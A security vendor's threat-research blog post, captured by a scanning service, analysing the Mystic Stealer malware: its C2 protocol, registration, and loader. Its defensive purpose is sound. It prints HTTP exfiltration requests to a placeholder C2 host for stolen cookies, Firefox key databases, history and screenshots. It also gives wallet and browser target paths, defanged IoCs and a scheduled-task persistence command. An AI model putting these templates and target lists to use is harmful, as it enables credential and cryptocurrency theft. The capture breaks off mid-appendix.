www.zscaler.com
Open in
urlscan Pro
2606:4700::6812:1c4a
Public Scan
URL:
https://www.zscaler.com/blogs/security-research/mystic-stealer-revisited
Submission: On October 26 via api from DE — Scanned from DE
Submission: On October 26 via api from DE — Scanned from DE
Form analysis
3 forms found in the DOM<form class="topSearch_searchInputWrapper__pYYBt" __bizdiag="107944136" __biza="W___"><input type="text" name="query" class="topSearch_searchInput__N_10L" placeholder="What are you looking for?" aria-label="What are you looking for?"
aria-hidden="true" tabindex="-1" value=""></form>
<form class="marketoForm_root__OkMwH marketoForm_variant_cta_module__RcBac" id="mktoForm_7971" style="opacity:0" __bizdiag="196539198" __biza="W___"></form>
<form class="marketoForm_root__OkMwH marketoForm_variant_footer__vL4cA footer-subscription" id="mktoForm_1944" style="opacity:0" __bizdiag="196360362" __biza="W___"></form>
Text Content
This site uses JavaScript to provide a number of functions, to use this site please enable JavaScript in your browser. Live Global Events: Secure, Simplify, and Transform Your Business. See Agenda and Locations Close OpenSearch CXO REvolutionariesCareersPartnersSupport ShowContact UsOptions Get in touch1-408-533-0288Chat with us ShowSign InOptions admin.zscaler.netadmin.zscalerone.netadmin.zscalertwo.netadmin.zscalerthree.netadmin.zscalerbeta.netadmin.zscloud.netZscaler Private Access Home The Zscaler ExperienceProducts & SolutionsPlatformResourcesCompany Request a demoopen search open navigation The Zscaler Experience Zscaler: A Leader in the 2023 Gartner® Magic Quadrant™ for Security Service Edge (SSE) Get the full report Your world, secured Experience the transformative power of zero trust. The Zscaler Difference The Zscaler Difference Experience the World’s Largest Security Cloud Customer Success Stories Analyst Recognition Machine Learning and AI at Zscaler Reduce Your Carbon Footprint Zero Trust Fundamentals Zero Trust Fundamentals What is Zero Trust? What Is Security Service Edge (SSE)? What Is Secure Access Service Edge (SASE)? What Is Zero Trust Network Access (ZTNA)? What Is Secure Web Gateway (SWG)? What Is Cloud Access Security Broker (CASB)? What Is Cloud Native Application Protection Platform (CNAPP)? Zero Trust Resources Products & Solutions Secure Your Users Provide users with seamless, secure, reliable access to applications and data. Secure Your Workloads Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud. Secure Your IoT and OT Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems. Products Products Transform your organization with 100% cloud native services Secure Internet Access (ZIA) Secure Private Access (ZPA) Data Protection (CASB/DLP) Digital Experience (ZDX) Posture Control Partner IntegrationsIndustry and Market Solutions Solution Areas Solution Areas Propel your business with zero trust solutions that secure and connect your resources Stop Cyberattacks Protect Data Zero Trust App Access VPN Alternative Accelerate M&A Integration Optimize Digital Experiences Zero Trust Branch Connectivity Build and Run Secure Cloud Apps Zero Trust Cloud Connectivity Zero Trust for IoT/OT Zero Trust for Private 5G Find a product or solution Platform Zero Trust Exchange Platform Learn how Zscaler delivers zero trust with a cloud native platform that is the world’s largest security cloud Zero Trust Exchange PlatformTitle Link Transform with Zero Trust Architecture Transform with Zero Trust Architecture Propel your transformation journey Secure Digital Transformation Network Transformation Application Transformation Security Transformation Secure Your Business Goals Secure Your Business Goals Achieve your business and IT initiatives Ensure Secure Business Continuity Accelerate M&A and Divestitures Recession-Proof Your Enterprise Secure Your Hybrid Workforce Download Zscaler Client Connectors Resources Learn, connect, and get support. Explore tools and resources to accelerate your transformation and secure your world Learn, connect, and get support.Title Link Amplifying the voices of real-world digital and zero trust pioneers Visit now Resource Center Resource Center Stay up to date on best practices Resource Library Blog Customer Success Stories Webinars & Demos Zpedia Events & Trainings Events & Trainings Find programs, certifications, and events Upcoming Events Zenith Live Zscaler Academy Interactive Zscaler Whiteboard Workshop Security Research & Services Security Research & Services Get research and insights at your fingertips ThreatLabz Analytics Tools Tools Tools designed for you Security Preview Security and Risk Assessment Security Advisory Updates Disclose a Vulnerability Executive Insights App Ransomware Protection ROI Calculator Community & Support Community & Support Connect and find support Customer Success Center Zenith Community CXO REvolutionaries Zscaler Help Portal Download Zscaler Client Connector Industry & Market Solutions Industry & Market Solutions See solutions for your industry and country Public Sector Healthcare Financial Services Education See all Resource Center Resource Center Stay up to date on best practices Resource Library Blog Customer Success Stories Webinars & Demos Zpedia Events & Trainings Events & Trainings Find programs, certifications, and events Upcoming Events Zenith Live Zscaler Academy Interactive Zscaler Whiteboard Workshop Security Research & Services Security Research & Services Get research and insights at your fingertips ThreatLabz Analytics Tools Tools Tools designed for you Security Preview Security and Risk Assessment Security Advisory Updates Disclose a Vulnerability Executive Insights App Ransomware Protection ROI Calculator Community & Support Community & Support Connect and find support Customer Success Center Zenith Community CXO REvolutionaries Zscaler Help Portal Download Zscaler Client Connector Industry & Market Solutions Industry & Market Solutions See solutions for your industry and country Public Sector Healthcare Financial Services Education See all Company About Zscaler Discover how it began and where it’s going Partners Meet our partners and explore system integrators and technology alliances News & Announcements Stay up to date with the latest news Leadership Team Meet our management team Partner Integrations Explore best-in-class partner integrations to help you accelerate digital transformation Investor Relations See news, stock information, and quarterly reports Environmental, Social & Governance Learn about our ESG approach Careers Join our mission Press Center Find everything you need to cover Zscaler Compliance Understand our adherence to rigorous standards Zenith Ventures Understand our adherence to rigorous standards ZSCALER BLOG Get the latest Zscaler blog updates in your inbox Subscribe Security Research MYSTIC STEALER REVISITED JAVIER VICENTE - Sr. Staff Security Researcher October 25, 2023 - 21 min read Threatlabz Research Contents 1. Introduction 2. Key Takeaways 3. Technical Analysis 4. Communications 5. Conclusion 6. Cloud Sandbox 7. Indicators of Compromise (IoCs) 8. Appendix 9. More blogs Copy URL Copy URL INTRODUCTION Mystic Stealer is a relatively new downloader and information stealer that emerged in early 2023. The malware harvests data from a large number of web browsers and cryptocurrency wallet applications. Mystic can also be used to steal Steam game credentials and arbitrary files from an infected system. Mystic stands out for the level of obfuscation and improvements with each new version of the malware. The code continues to evolve and expand the data theft capabilities and the network communication was updated from a custom binary TCP-based protocol to an HTTP-based protocol. The shift to HTTP may be due to Mystic Stealer failing to beacon back to a C2 server in corporate environments, which frequently block network traffic on non-standard ports. The new modifications have led to increased popularity with criminal threat actors leveraging its loader functionality to distribute additional malware families including RedLine, DarkGate, and GCleaner. In this blog, we will analyze the latest updates to Mystic Stealer as a follow-up to our previous report. KEY TAKEAWAYS * Mystic Stealer is an information stealer that was first advertised in April 2023, which targets nearly 40 web browsers and more than 70 browser extensions. * Mystic Stealer has been regularly updated with improvements to its code obfuscation, configuration, and methods of communication. * The malware’s command and control (C2) communications have been updated from a custom encrypted binary protocol to HTTP. * Mystic Stealer has added loader functionality in recent versions to complement its information stealing abilities. * Mystic Stealer has been used by numerous threat groups that leverage it to distribute second-stage malware payloads including RedLine, DarkGate, and GCleaner. TECHNICAL ANALYSIS The latest variant of Mystic Stealer has introduced some notable changes in both the behavior of the malware and in the obfuscation. The entry point of the malware is very similar to the older variant. The malware exits if the current date is older than a specific hardcoded date. Figure 1 shows a comparison of the main function between the previous variant and the current variant. Figure 1: Comparison of the WinMain function for the current and previous Mystic variants In the latest variant of Mystic Stealer, the decryption of the malware C2s has been moved to a sub-function that is executed after the expiration date (probably to avoid leaking the C2s in memory if this time check fails). EMBEDDED C2 CONFIGURATION The algorithm used to decrypt the list of C2 is the same custom XTEA-based algorithm as the previous variant. However, after the custom XTEA layer has been decrypted, there is a sequence of HTTP C2s, separated by a “|” delimiter. The C2 path is stored among the list of obfuscated strings that are constructed and decoded using the stack as shown in Figure 2. Figure 2. Mystic Stealer C2 path obfuscation INFORMATION STEALING CONFIGURATION In the previous Mystic Stealer variant, the target lists for web browsers, extensions (and their IDs), and cryptocurrency applications were embedded and obfuscated in the malware. In recent versions, the application target list is now downloaded from the C2 server instead of being hardcoded, as we will examine in the following section. COMMUNICATIONS In the latest Mystic Stealer variant, all communications between the infected system and the C2 server are performed using HTTP POST requests. Unlike the previous variant that used RC4 to encrypt a custom binary TCP-based protocol, the latest variant does not implement any form of encryption. The data sent in the POST query is Base64 encoded, as shown below: -------------------------------------------------------------------------------- POST /loghub/master HTTP/1.1 Content-Type: multipart/form-data; boundary=<boundary> Content-Length: NNN User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1) Host: X.X.X.X Connection: Keep-Alive Cache-Control: no-cache --<boundary> Content-Disposition: form-data; name="<name>" BASE64(<data>) --<boundary> -------------------------------------------------------------------------------- The response data from the server is also encoded in Base64. The response starts with “OK\r\n” and is followed by any data returned by the C2 server for the specific query. -------------------------------------------------------------------------------- HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 11 Sep 2023 HH:MM:SS GMT Content-Type: text/html; charset=utf-8 Content-Length: NNN Connection: keep-alive X-Frame-Options: DENY X-Content-Type-Options: nosniff Referrer-Policy: same-origin BASE64(OK <rest of data for the specific command, if necessary>) -------------------------------------------------------------------------------- REGISTRATION The infected system (bot) starts communication with the C2 server by sending a POST request with data containing a variable named hwid, which includes a Base64 encoded bot ID generated based on information from the victim’s machine. A second variable with the name build contains the botnet ID, a value that is hardcoded in the binary of the malware. Once the C2 receives these initial two packets, the bot is registered. -------------------------------------------------------------------------------- POST /loghub/master HTTP/1.1 Content-Type: multipart/form-data; boundary=<boundary> Content-Length: NNN User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1) Host: X.X.X.X Connection: Keep-Alive Cache-Control: no-cache --<boundary> Content-Disposition: form-data; name="hwid" BASE64(0123456789ABCDEF123456) --<boundary> Content-Disposition: form-data; name="build" BASE64(botnet_id) --<boundary>-- -------------------------------------------------------------------------------- The C2 server generates and returns a session token (a 64 byte lowercase hexadecimal string) that will be used in subsequent packets, together with a set of binary flags that indicates which actions should be performed (take a screenshot, steal browser credentials, steal cryptocurrency wallets, etc). -------------------------------------------------------------------------------- HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 07 Sep 2023 HH:MM:SS GMT Content-Type: text/html; charset=utf-8 Content-Length: NNN Connection: keep-alive X-Frame-Options: DENY X-Content-Type-Options: nosniff Referrer-Policy: same-origin BASE64(OK <token>1|1|1|1|0|1|1|1|0|1|1) -------------------------------------------------------------------------------- When the bot submits information to the C2 server, it sends a POST request with: * A filename variable containing the name of the file being submitted, Base64 encoded * A file variable with the content of the file, also Base64 encoded * A token variable with the session token from the registration request -------------------------------------------------------------------------------- POST /loghub/master HTTP/1.1 Content-Type: multipart/form-data; boundary=<boundary> Content-Length: NNN User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1) Host: X.X.X.X Connection: Keep-Alive Cache-Control: no-cache --<boundary> Content-Disposition: form-data; name="filename" BASE64("example.txt") --<boundary> Content-Disposition: form-data; name="file" BASE64(<content of example.txt>) Content-Disposition: form-data; name="token" BASE64(<token>) –<boundary>-- -------------------------------------------------------------------------------- If the request is valid, the server answers with an OK response. After registration, the bot sends information about the infected system via a file named SystemInformation.txt that contains information similar to the following: -------------------------------------------------------------------------------- Build mark: zzzz IP: {ip} File Location: C:\Users\xxxx\AppData\Local\Temp\aaaa\bbbb.exe UserName: xxxx ComputerName: XXXX Country: {country} Location: {location} Zip code: {zipcode} TimeZone: {timezone} HWID: 0123456789ABCDEF012345 Current language: English (United States) ScreenSize: 1792x1120 Operation System: Windows 10 Pro x64 Available KeyboardLayouts: English (United States) Hardwares: CPU: Intel(R) Core(TM) i9-9980HK CPU @ 2.40GHz GPU: VMware SVGA 3D RAM: 4293898240ll -------------------------------------------------------------------------------- INFORMATION STEALING Once Mystic Stealer has registered and reported the infected system information, the binary flags from the C2 server determine whether to conduct data theft and load additional malware payloads. Mystic Stealer sends HTTP POST requests for specific target lists by specifying the value in a msg variable. BROWSERS Depending on the configuration, Mystic Stealer will steal data from Chromium-based browsers by first requesting a target list from the C2 server. -------------------------------------------------------------------------------- POST /loghub/master HTTP/1.1 Content-Type: multipart/form-data; boundary=<boundary> Content-Length: NNN User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1) Host: X.X.X.X Connection: Keep-Alive Cache-Control: no-cache --<boundary> Content-Disposition: form-data; name="msg" BASE64("chromium-browsers") --<boundary> Content-Disposition: form-data; name="token" BASE64(<token>) --<boundary>-- -------------------------------------------------------------------------------- The Mystic Stealer C2 server will respond with a list of Chromium-based browsers to target. The Appendix section shows the full list of browsers that have been targeted. -------------------------------------------------------------------------------- Citrio|%localappdata%\CatalinaGroup\Citrio\User Data|Coowon|%localappdata%\Coowon\Coowon\User Data|Liebao|%localappdata%\liebao\User Data|QIP Surf|%localappdata%\QIP Surf\User Data|Orbitum|%localappdata%\Orbitum\User Data|Comodo Dragon|%localappdata%\Comodo\Dragon\User Data|Amigo|%localappdata%\Amigo\User\User Data|Torch|%localappdata%\Torch\User Data|Yandex Browser|%localappdata%\Yandex\YandexBrowser\User Data|Comodo|%localappdata%\Comodo\User Data|360Browser|%localappdata%\360Browser\Browser\User Data|Maxthon3|%localappdata%\Maxthon3\User Data|K-Melon|... -------------------------------------------------------------------------------- Each element of the list contains the name of the browser and the path where the browser’s data is stored: -------------------------------------------------------------------------------- Browser name 1|Browser path 1|..............|Browser N|Browser path N -------------------------------------------------------------------------------- Mystic Stealer also retrieves a list of browser extensions to target. -------------------------------------------------------------------------------- POST /loghub/master HTTP/1.1 Content-Type: multipart/form-data; boundary=<boundary> Content-Length: NNN User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1) Host: X.X.X.X Connection: Keep-Alive Cache-Control: no-cache --<boundary> Content-Disposition: form-data; name="msg" BASE64(extensions) --<boundary> Content-Disposition: form-data; name="token" BASE64(<token>) --<boundary>-- -------------------------------------------------------------------------------- The Mystic Stealer C2 server will return the browser extensions configuration. -------------------------------------------------------------------------------- Coinbase Wallet|hnfanknocfeofbddgcijnmhnfnkdnaad|Guarda|hpglfhgfnhbgpjdenjgmdg oeiappafln|EQUAL Wallet|blnieiiffboillknjnepogjhkgnoapac|Jaxx Liberty|cjelfplplebdjjenllpjcblmjkfcffne|BitApp Wallet|fihkakfobkmkjojpchpfgcmhfjnmnfpi|iWallet|kncchdigobghenbbaddoj jnnaogfppfj|Wombat|amkmjjmmflddogmhpjloimipbofnfjih|MEW CX|nlbmnnijcnlegkjjpcfjclmcfggfefdm|GuildWallet|nanjmdknhkinifnkgdcgg cfnhdaammmj|Saturn Wallet|nkddgncdjgjfcddamfgcmfnlhccnimig|Ronin Wallet|fnjhmkhhmkbjkkabndcnnogagogbneec|NeoLine|cphhlgmgameodnhkjdmkp anlelnlohao|CLV Wallet|nhnkbkgjikgcigadomkphalanndcapjk|Liquality Wallet|kpfopkelmapcoipemfendmdcghnegimn|Terra Station|aiifbnbfobpmeekipheeijimdpnlpgpp|Keplr|dmkamcknogkgcdfhhbddcg hachkejeap|Sollet|fhmfendgdocmcbmfikdcogofphimnkno|... -------------------------------------------------------------------------------- In this case, each element contains the name of the extension and the ID. -------------------------------------------------------------------------------- Extension name 1|Extension ID 1|....|Extension name N|Extension ID N -------------------------------------------------------------------------------- Next, the malware downloads the legitimate sqlite3.dll DLL from the C2 server. This library is used to parse web browser SQLite database files. -------------------------------------------------------------------------------- POST /loghub/master HTTP/1.1 Content-Type: multipart/form-data; boundary=<boundary> Content-Length: NNN User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1) Host: X.X.X.X Connection: Keep-Alive Cache-Control: no-cache --<boundary> Content-Disposition: form-data; name="msg" BASE64("sqlite3") --<boundary> Content-Disposition: form-data; name="token" BASE64(<token>) --<boundary>-- -------------------------------------------------------------------------------- The response is the sqlite3 DLL Base64 encoded, as shown below: -------------------------------------------------------------------------------- HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 11 Sep 2023 HH:MM:SS GMT Content-Type: text/html; charset=utf-8 Content-Length: NNN Connection: keep-alive X-Frame-Options: DENY X-Content-Type-Options: nosniff Referrer-Policy: same-origin BASE64(OK BASE64(<sqlite3 file>)) -------------------------------------------------------------------------------- The stolen browser data (if any) is sent to the C2 server. For example, cookies stolen from Microsoft Edge (which is Chromium-based) would be exfiltrated, as shown below: -------------------------------------------------------------------------------- POST /loghub/master HTTP/1.1 Content-Type: multipart/form-data; boundary=<boundary> Content-Length: NNN User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1) Host: X.X.X.X Connection: Keep-Alive Cache-Control: no-cache --<boundary> Content-Disposition: form-data; name="filename" BASE64(“Cookies/Microsoft_Edge_Default.txt”) --<boundary> Content-Disposition: form-data; name="file" BASE64(<content of Cookies/Microsoft_Edge_Default.txt>) Content-Disposition: form-data; name="token" BASE64(<token>) –<boundary>-- -------------------------------------------------------------------------------- Depending on the configuration, Mystic Stealer will also retrieve a list gecko-browsers to target. -------------------------------------------------------------------------------- POST /loghub/master HTTP/1.1 Content-Type: multipart/form-data; boundary=<boundary> Content-Length: NNN User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1) Host: X.X.X.X Connection: Keep-Alive Cache-Control: no-cache --<boundary> Content-Disposition: form-data; name="msg" BASE64("gecko-browsers") --<boundary> Content-Disposition: form-data; name="token" BASE64(<token>) --<boundary>-- -------------------------------------------------------------------------------- The configuration format is identical to the chromium-browser list. -------------------------------------------------------------------------------- Firefox|%appdata%\Mozilla\Firefox\Profiles|Comodo IceDragon|%appdata%\Comodo\IceDragon\Profiles|BlackHawk|%appdata%\NET GATE Technologies\BlackHawk\Profiles|Cyber fox|%appdata%\8pecxstudios\Cyberfox\Profiles|K-Meleon|%appdata%\K-Meleon\Profiles|Icecat|%appdata%\Mo zilla\icecat\Profiles -------------------------------------------------------------------------------- Mystic Stealer will collect a number of database files from Firefox-based browsers containing cookies, certificates, keys, etc., as shown below: -------------------------------------------------------------------------------- POST /loghub/master HTTP/1.1 Content-Type: multipart/form-data; boundary=<boundary> Content-Length: NNN User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1) Host: X.X.X.X Connection: Keep-Alive Cache-Control: no-cache --<boundary> Content-Disposition: form-data; name="filename" BASE64("Gecko/Firefox/<profile>.default/key4.db") --<boundary> Content-Disposition: form-data; name="file" BASE64(<content of Gecko/Firefox/<profile>.default/key4.db>) Content-Disposition: form-data; name="token" BASE64(<token>) –<boundary>-- HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 11 Sep 2023 HH:MM:SS GMT Content-Type: text/html; charset=utf-8 Content-Length: NNN Connection: keep-alive X-Frame-Options: DENY X-Content-Type-Options: nosniff Referrer-Policy: same-origin BASE64(OK) POST /loghub/master HTTP/1.1 Content-Type: multipart/form-data; boundary=<boundary> Content-Length: NNN User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1) Host: X.X.X.X Connection: Keep-Alive Cache-Control: no-cache --<boundary> Content-Disposition: form-data; name="filename" BASE64("Gecko/Firefox/<profile>.default/cert9.db") --<boundary> Content-Disposition: form-data; name="file" BASE64(<content of Gecko/Firefox/<profile>.default/cert9.db>) Content-Disposition: form-data; name="token" BASE64(<token>) –<boundary>-- HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 11 Sep 2023 HH:MM:SS GMT Content-Type: text/html; charset=utf-8 Content-Length: NNN Connection: keep-alive X-Frame-Options: DENY X-Content-Type-Options: nosniff Referrer-Policy: same-origin BASE64(OK) POST /loghub/master HTTP/1.1 Content-Type: multipart/form-data; boundary=<boundary> Content-Length: NNN User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1) Host: X.X.X.X Connection: Keep-Alive Cache-Control: no-cache --<boundary> Content-Disposition: form-data; name="filename" BASE64("Cookies/Firefox_<profile>.default.txt") --<boundary> Content-Disposition: form-data; name="file" BASE64(<content of Cookies/Firefox_<profile>.default.txt>) Content-Disposition: form-data; name="token" BASE64(<token>) –<boundary>-- HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 11 Sep 2023 HH:MM:SS GMT Content-Type: text/html; charset=utf-8 Content-Length: NNN Connection: keep-alive X-Frame-Options: DENY X-Content-Type-Options: nosniff Referrer-Policy: same-origin BASE64(OK) -------------------------------------------------------------------------------- If the browser history configuration flag (position 4) is set to 1, Mystic Stealer also sends the victim’s browsing history. -------------------------------------------------------------------------------- POST /loghub/master HTTP/1.1 Content-Type: multipart/form-data; boundary=<boundary> Content-Length: NNN User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1) Host: X.X.X.X Connection: Keep-Alive Cache-Control: no-cache --<boundary> Content-Disposition: form-data; name="filename" BASE64("History/Firefox_8qjvd3qg.default-release.txt") --<boundary> Content-Disposition: form-data; name="file" BASE64(<content of History/Firefox_8qjvd3qg.default-release.txt>) Content-Disposition: form-data; name="token" BASE64(<token>) –<boundary>-- -------------------------------------------------------------------------------- The browser history file contains the website title (if available) and the URL as shown below: -------------------------------------------------------------------------------- Title: <Title1> Url: <url1> =============== Title: <Title2> Url: <url2> =============== ... =============== Title: <TitleN> Url: <urlN> =============== -------------------------------------------------------------------------------- SCREENSHOTS If the screenshot configuration flag (position 8) is set to 1, Mystic Stealer captures and sends a screenshot of the victim’s desktop. -------------------------------------------------------------------------------- POST /loghub/master HTTP/1.1 Content-Type: multipart/form-data; boundary=<boundary> Content-Length: NNN User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1) Host: X.X.X.X Connection: Keep-Alive Cache-Control: no-cache --<boundary> Content-Disposition: form-data; name="filename" BASE64("Screenshot.jpeg") --<boundary> Content-Disposition: form-data; name="file" BASE64(<content of Screenshot.jpeg>) Content-Disposition: form-data; name="token" BASE64(<token>) –<boundary>-- -------------------------------------------------------------------------------- FILES Mystic Stealer also downloads a list of files to be stolen from the victim. -------------------------------------------------------------------------------- POST /loghub/master HTTP/1.1 Content-Type: multipart/form-data; boundary=<boundary> Content-Length: NNN User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1) Host: X.X.X.X Connection: Keep-Alive Cache-Control: no-cache --<boundary> Content-Disposition: form-data; name="msg" BASE64("files") --<boundary> Content-Disposition: form-data; name="token" BASE64(<token>) --<boundary>-- -------------------------------------------------------------------------------- The Mystic Stealer C2 server returns a list of target files and directories to steal. For example, ThreatLabz has observed this feature used to steal cryptocurrency wallets as shown below: -------------------------------------------------------------------------------- Wallets/Jaxx Desktop|%appdata%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveld b|*.*|0|Wallets/Atomic|%appdata%\atomic\Local Storage\leveldb|*.*|0|Wallets/Binance|%appdata%\Binance|app-store.jso n,simple-storage.json,.finger-print.fp|0|Wallets/Co inomi|%appdata%\Coinomi\Coinomi\wallets|.wallet,*.config|0|Wallets/Exo dus|%appdata%\Exodus|exodus.conf.json,window-state.json,passphrase.json,seed.seco,info .seco|1|Wallets/Bitcoin Core|%appdata%\Bitcoin\wallets|wallet.dat|1|Wallets/Bitcoin Core Old|%appdata%\Bitcoin|*wallet*.dat|0|Wallets/Dogecoin|%appdata%\Bitco in\wallets|*wallet*.dat|0|Wallets/Raven Core|%appdata%\Raven|*wallet*.dat|0|Wallets/Daedalus Mainnet|%appdata%\Daedalus Mainnet\wallets|she*.sqlite|0|Wallets/Blockstream Green|%appdata%\Blockstream\Green\wallets|*.*|1|Wallets/Wasabi Wallet|%appdata%\WalletWasabi\Client\Wallets|*.json|0|Wallets/Ethereu m|%appdata%\Ethereum|keystore|0|Wallets/Electrum|%appdata%\Electrum\w allets|*.*|0|Wallets/ElectrumLTC|%appdata%\Electrum-LTC\wallets|*.*|0 |Wallets/Electron Cash|%appdata%\ElectronCash\wallets|*.*|0|Wallets/MultiDoge|%appdata% \MultiDoge|multidoge.wallet|0|Wallets/Jaxx Desktop Old|%appdata%\jaxx\Local Storage|file__0.localstorage|0 -------------------------------------------------------------------------------- The format for each targeted file is shown below: -------------------------------------------------------------------------------- Directory name|Location on disk|Target files mask|Flag -------------------------------------------------------------------------------- The flag parameter indicates whether Mystic Stealer should recursively search the target directory. Once finished, a “done” msg is sent, to indicate the file stealing task is finished. LOADER A “loader” msg can be sent by Mystic Stealer to the C2 server to request additional second-stage malware payloads, as shown below: -------------------------------------------------------------------------------- POST /loghub/master HTTP/1.1 Content-Type: multipart/form-data; boundary=<boundary> Content-Length: NNN User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1) Host: X.X.X.X Connection: Keep-Alive Cache-Control: no-cache --<boundary> Content-Disposition: form-data; name="msg" BASE64("loader") --<boundary> Content-Disposition: form-data; name="token" BASE64(<token>) --<boundary>-- HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 11 Sep 2023 HH:MM:SS GMT Content-Type: text/html; charset=utf-8 Content-Length: NNN Connection: keep-alive X-Frame-Options: DENY X-Content-Type-Options: nosniff Referrer-Policy: same-origin BASE64(OK |1|BASE64(exe1)| |1|BASE64(exe2)| ....|1|BASE64(exeN)) -------------------------------------------------------------------------------- The response to the loader request is an initial Base64 encoded layer containing an OK response with a set of one or more Base64 encoded executables: Figure 3: Base64 encoded executables downloaded by Mystic Stealer The packet follows this format: -------------------------------------------------------------------------------- |1|BASE64(exe1)| |1|BASE64(exe2)| ....|1|BASE64(exeN) -------------------------------------------------------------------------------- The parameter that precedes the Base64 encoded executable does not appear to be currently used, although it may indicate a potential feature that has yet to be implemented such as whether to write the binary to disk or inject it into another process. After downloading and executing these binary payloads, Mystic Stealer sends a final POST request with the message “loadercode”. The C2 server will then return an empty response. DEBUG BUILDS Zscaler ThreatLabz has found recent samples compiled in September and October 2023, which contain plaintext strings that typically are obfuscated in other samples: Figure 4: Mystic Stealer debug version plaintext strings In addition, these samples have string references with full file paths (instead of a relative path like ..\\chromiumbrowsers.cpp in non-debug samples) to the original C++ code. Interestingly, the username in these full paths is will. ThreatLabz suspects these samples are compiled from code that is still in development where they could be testing improvements and new features. CONCLUSION Even though Mystic Stealer is a relatively new information stealing malware, ThreatLabz has observed a significant increase in threat actors leveraging it to deploy additional malware. The developer behind Mystic Stealer is continuously modifying and improving the code, and the malware is quickly evolving. The C2 communication protocol used by Mystic Stealer has switched from a custom binary protocol to an HTTP-based protocol, likely to improve beaconing from infections in corporate environments that leverage firewalls to filter suspicious network traffic. Based on the number of new Mystic Stealer samples and C2 panels, the malware is likely to continue to pose a threat to organizations. In addition to staying on top of these threats, Zscaler's ThreatLabz team continuously monitors for new threats and shares its findings with the wider community. CLOUD SANDBOX Zscaler’s multilayered cloud security platform detects indicators related to Mystic Stealer at various levels. INDICATORS OF COMPROMISE (IOCS) HashFirst SeenExpiration DateBotnet IDC2 6203249bebf7248535ff5ef70a7c5a57 688b399d91ac63c9d73441af6e65f184 2023-10-08 08:36:29 UTC2023-11-09T20:02:2115 hxxp://171.22.28[.]235/loghub/master 7eb8617d09f204dd40541a000f98810 19ff103ff330cb0e7aebb8c3a160cfd26 2023-09-29 15:30:00 UTC2023-10-26T11:48:42Chung hxxp://194.87.31[.]123/loghub/master 21a8db193093caf6acbcd14ba64c9 8a1c9f16998cade8f60fa0fb4dc63e33bd2 2023-09-18 21:36:22 UTC2023-09-22T12:35:08mema hxxp://5.42.92[.]211/loghub/master 7003eadaef73ac1f2e0f0a86a3d1f57 92a5dde3a45ba71e095861b55059b3780 2023-09-07 07:53:28 UTC2023-09-12T20:08:32tresk hxxp://5.42.92[.]211/loghub/master 00fe26cfe465740e61b99f105bcf251 6ff49e117f23f4b508d5256c57fa3fc66 2023-06-26 05:51:47 UTC2023-07-24T18:48:13sup hxxp://188.40.116[.]251:8005/loghub/master APPENDIX DECRYPTED MALWARE STRINGS * %08lX%04lX%lu * %ix%i * %ls %ls * %ls [%ls %d] ERROR in %s, line %d, function %s. %s * %ls\\%ls * %ls\\%ls\\Local State * %ls\\* * %ls\\Web Data * %ls\\cookies.sqlite * %ls\\formhistory.sqlite * %ls\\places.sqlite * %s/%s * %userprofile%\\Telegram Desktop\\tdata * &&\" **(# + * &0'fg{199 * (ov_(ov * ,+& ##* * -t{d2 * ..*($2nd-2d-2o595 * ..\\stealer\\chromiumbrowsers.cpp * ..\\stealer\\filesgrabber.cpp * ..\\stealer\\geckobrowsers.cpp * ..\\stealer\\httpclient.cpp * ..\\stealer\\loader.cpp * ..\\stealer\\sqlite3.cpp * ..\\stealer\\stealer.cpp * /c schtasks /create /F /sc minute /mo 15 /tr \"%ls\" /tn \"\\WindowsAppPool\\%ls\" * LeaveCriticalSection * EnterCriticalSection * Advapi32.dll * Autofills/%ls_%ls.txt * Available KeyboardLayouts: Gonna gather system information * Build mark: * CPU: * Can't add task in task scheduleO, COeatePOocessW fails; last eOOoO: %x * Can't obtain RmStartSession's address, maybe windows don't support RestartManager * Can't start process; last error: %x * Can't write file; last error: %x * Card: * Chromium browsers paths were retrieved * ComSpec * Command line: %ls * ComputerName: * Config retrieved: %d, %d, %d, %d, %d, %d, %d, %d, %d, %d * Content-Disposition: form-data; name=\"%s\" * Content-Length: %d * Content-Type: multipart/form-data; boundary=%s * Cookies * Cookies/%ls_%ls.txt * Country: {country} * CreditCards/%ls_%ls.txt * Current language: * Default * Email * Email/Credentials.txt * Email: * EnterCriticalSection * Expand path: %ls * Extensions were retrieved * FALSE * Failed to connect to %s * Failed to download sqlite3.dll * Failed to export functions from sqlite3.dll * Failed to load sqlite3.dll * Failed to retrieve chromium browsers paths * Failed to retrieve files grabber paths * Failed to retrieve gecko browsers paths * File Location: * Files grabber paths were retrieved * FilesGrabber: Sent %ls * Find chromium cookies db %ls * Find chromium extension %ls with id %ls * Find chromium history db %ls * Find 